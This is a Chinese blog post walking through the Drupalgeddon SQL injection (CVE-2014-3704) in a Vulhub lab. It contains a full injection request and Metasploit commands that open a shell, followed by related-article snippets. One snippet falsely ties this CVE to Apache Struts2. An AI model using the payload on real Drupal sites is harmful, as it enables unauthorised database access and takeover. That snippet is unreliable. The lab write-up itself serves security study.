Vulhub之“Drupalgeddon” SQL注入漏洞(CVE-2014-3704)

最新推荐文章于 2025-04-21 17:33:08 发布
原创 最新推荐文章于 2025-04-21 17:33:08 发布
· 3.8k 阅读 · 10 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

简介

Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。

 

 

漏洞环境

进入对应的路径:  vulhub-master/drupal/CVE-2014-3704

执行如下命令启动Drupal 7.31环境:

docker-compose up -d

环境启动后,访问http://ip:8080即可看到Drupal的安装页面,使用默认配置安装即可。

其中,Mysql数据库名填写drupal,数据库用户名、密码为root,地址为mysql

安装成功之后,  访问主页:

 

 

漏洞复现

该漏洞无需认证,发送如下数据包即可执行恶意SQL语句:

POST /?q=node&destination=node HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

name[0 or updatexml(0,concat(0xa,database()),0)%23]=bob&name[0]=a&pass=bug&form_build_id=form-hUM-lGJvIc5NEmlo46nu_0Z7cOfyfmk6BQjvIRD4goA&form_id=user_login_block
&op=Log in

报错注入成功。

 

 

msf工具利用

搜索drupal漏洞:

search drupal

 查看漏洞信息:

show info exploit/multi/http/drupal_drupageddon

使用CVE-2014-3704对应的攻击模块:

use exploit/multi/http/drupal_drupageddon

设置Drupal网站路径:

set targeturi /

所定攻击的ip和端口:

set RHOSTS 192.168.10.10

set rport 8080

发动攻击,  拿到shell:

exploit

 

[ vulhub漏洞复现篇 ] Drupal<7.32 Drupalgeddon SQL注入漏洞CVE-2014-3704
qq_51577576的博客
02-16 1718
[ vulhub漏洞复现篇 ] Drupal<7.32 Drupalgeddon SQL注入漏洞CVE-2014-3704) Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 2065
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
php cve-2014-8142漏洞,Drupal 7.31 SQL注入漏洞CVE-2014-3704) EXP测试代码
weixin_39594312的博客
04-01 815
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。最近频繁爆发各种0day,真是把大家累坏了。Drupal 7.31 SQL注入漏洞(CVE-2014-3704)就是其中一个,该漏洞利用测试方法“简单粗暴”,受到安全研究者们的青睐。Drupal Sql注入漏洞原理是酱紫的,Drupal在处理IN语句的时候,要通过expandArgu...
Drupal Drupalgeddon 2 未授权远程代码执行漏洞CVE-2018-7600)
最新发布
sucker的博客
04-21 907
环境启动后,访问http://your-ip:8080/将会看到Drupal的安装页面。漏洞的触发点在 Drupal 的 AJAX 渲染机制中,攻击者可以通过设置 _drupal_ajax=1 参数,强制 Drupal 以 AJAX 模式执行表单渲染流程,此流程中会解析并渲染用户提交的数据。Drupal 渲染表单元素的核心流程中会检测是否存在 #post_render、#markup 等字段,如果存在,则会调用其中。Drupal 没有对这些 # 开头的特殊字段做适当的白名单校验,导致攻击者可以。
CVE-2014-3704 Drupal SQL注入漏洞
星落的博客
04-07 4160
目录 漏洞介绍 影响版本 环境搭建 漏洞复现 漏洞介绍 Drupal 是一款用量庞大的CMS,其中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码 影响版本 7.0-7.31 环境搭建 1.切换到drupal相关目录下,部署docker环境 cd/root/vulhub/weblogic/CVE-2014-3704 docker-compose build docker-compose up -d 2...
[春秋云镜]CVE-2014-3704
niubi707的博客
11-30 1124
[春秋云镜]CVE-2014-3704 Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由由内容管理系统和PHP开发框架共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。 Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。
【春秋云镜】CVE-2014-3704
2301_78321656的博客
07-15 2292
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由由内容管理系统和PHP开发框架共同构成,在GPL2.0及更新协议下发布。Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。访问漏洞环境,寻找可以利用的点,发现有登录框并根据漏洞简介,猜测可能在此有SQL注入漏洞。构造注入payload放包,看到有报错回显,存在sql注入
DrupalgeddonSQL注入漏洞CVE-2014-3704
2301_76467680的博客
06-28 266
拉取环境访问页面后配置界面配置完成后显示下图然后登录界面抓包修改数据包POST /?q=node&destination=node HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: c
[CVE-2014-3704]Drupal 7.31 SQL注入漏洞分析与复现
weixin_30940783的博客
06-11 1494
记录下自己的复现思路 漏洞影响: Drupal 7.31 Drupal是一个开源内容管理平台,为数百万个网站和应用程序提供支持。 0x01漏洞复现 复现环境: 1)Apache2.4 2)Php 7.0 3)drupal 7.31https://www.drupal.org/drupal-7.31-release-notes(点击下载) 环境打包在目录下安装即可 ...
利用Vulnhub复现漏洞 - Drupal 小于 7.32 “DrupalgeddonSQL注入漏洞CVE-2014-3704
JiangBuLiu的博客
07-02 2329
Drupal < 7.32 “DrupalgeddonSQL注入漏洞CVE-2014-3704)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/drupal/CVE-2014-3704/ 漏洞原理 Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的S...
vulnhub靶场 DC-1靶机 渗透详细过程
黑战士的博客
07-26 1365
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
Python安全攻防-3渗透测试框架
快吃小蛋糕吧的博客
11-23 2300
最近新买了一本关于Python的一本书《Python安全攻防渗透测试实战指南》,这本书出自MS08067安全实验室,才学到第三章,虽然书中有非常多的低级语法错误,但是总体来讲还是值得一学的。 Pocsuite框架: 这里书中有对Pocsuite框架有基本的介绍,这里就不重复了,只需要知道这是一款基于漏洞与POC的远程漏洞验证框架即可。 安装: 通过git克隆代码仓库 git clone https://github.com/knownsec/pocsuite3.git 克隆完成后,仓库结构大概是这样的.
漏洞复现学习Drupalgeddonsql注入CVE-2014-3704
weixin_45935703的博客
12-16 531
Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。
春秋云镜 CVE-2014-3704
qq_22002773的博客
09-17 559
春秋云镜 CVE-2014-3704
Drupal <7.32“ DrupalgeddonSQL注入漏洞CVE-2014-3704
weixin_46236101的博客
09-18 768
Drupal是一种少量大量的CMS,其7.0〜7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入,修改管理员信息,甚至执行任意代码。 进攻环境 执行如下命令启动Drupal 7.31环境: docker-compose up -d 环境启动后,访问http://your-ip:8080即可看到Drupal的安装页面,使用替代配置安装即可。 其中,Mysql数据库名填写drupal,数据库用户名,密码为root,地址为mysql: 安装完成后,访问首页: 进攻复现
Drupal < 7.32 “DrupalgeddonSQL注入漏洞CVE-2014-3704
EC_Carrot的博客
05-27 483
漏洞背景 Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。 漏洞复现 该漏洞无需认证,发送如下数据包即可执行恶意SQL语句: POST /?q=node&destination=node HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User
DRUPAL-PSA-CORE-2014-005 && CVE-2014-3704 Drupal 7.31 SQL Injection Vulnerability /includes/database...
weixin_34307464的博客
11-01 252
目录 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考   1. 漏洞描述 Use Drupal to build everything from personal blogs to enterprise applications. Thousands of add-on modules and designs l...
漏洞复现】Drupal_小于7.32版本 _“DrupalgeddonSQL注入漏洞(CVE-2014-3704)
过期的秋刀鱼
11-04 739
存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。即可看到Drupal的安装页面,使用默认配置安装即可。Drupal 是一款用量庞大的CMS,其。Drupal 7.0~7.31版本。其中,Mysql数据库名填写。,数据库用户名、密码为。7.0~7.31版本。
Drupal漏洞之Drupal 7.31 SQL漏洞
2301_77778745的博客
04-25 778
1.通过python调用drupal7.x.py脚本对数据库进行注入。test test(后面两个test是新设的用户名和密码)2.输入命令:python drupal7.x.py。
cve-2014-3704
01-11
### CVE-2014-3704 漏洞详情 CVE-2014-3704 是 Apache Struts2 中的一个严重漏洞,允许攻击者通过构造特定的 HTTP 请求来执行任意代码。此漏洞源于 Struts2 对用户输入参数处理不当,在某些情况下未能正确转义特殊字符,从而使得恶意用户能够注入并执行 OGNL 表达式。 具体来说,当应用程序使用了带有通配符模式匹配功能的动作映射时,如果这些动作类中的方法接收未经验证或过滤的外部数据作为参数,则可能存在安全隐患[^1]。 ### 影响范围 受到影响的主要版本包括但不限于: - Apache Struts 2.0.0 - 2.3.16.1 (官方已发布修复版本) ### 安全风险评估 成功利用该漏洞可以导致未经授权的操作系统命令执行,进而完全控制目标Web应用及其所在主机。因此对于部署有Apache Struts框架的企业级网站而言,这是一个非常高危的安全威胁。 ### 修复方案 为了防止此类攻击的发生,建议采取如下措施之一进行防护: #### 更新至安全版本 最直接有效的方法就是尽快把Struts升级到不受影响的新版库中去。例如,可以从官方网站获取最新的稳定发行版,并按照说明文档完成迁移工作。 ```bash # 假设当前项目基于Maven构建 mvn dependency:update ``` #### 应用补丁程序 如果因为业务连续性的原因暂时无法立即切换整个依赖树的话,也可以考虑单独打上针对这个问题设计好的热修补丁包。 #### 修改配置文件 调整`struts.xml`或其他相关设置以禁用动态方法调用特性(DMI),这可以在一定程度上缓解潜在的风险暴露程度。 ```xml <constant name="struts.enable.DynamicMethodInvocation" value="false"/> ``` 另外还需要加强对传入HTTP请求的数据校验力度,确保所有可能成为OGNL表达式的字符串都被严格净化过才交给后台逻辑层处理。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值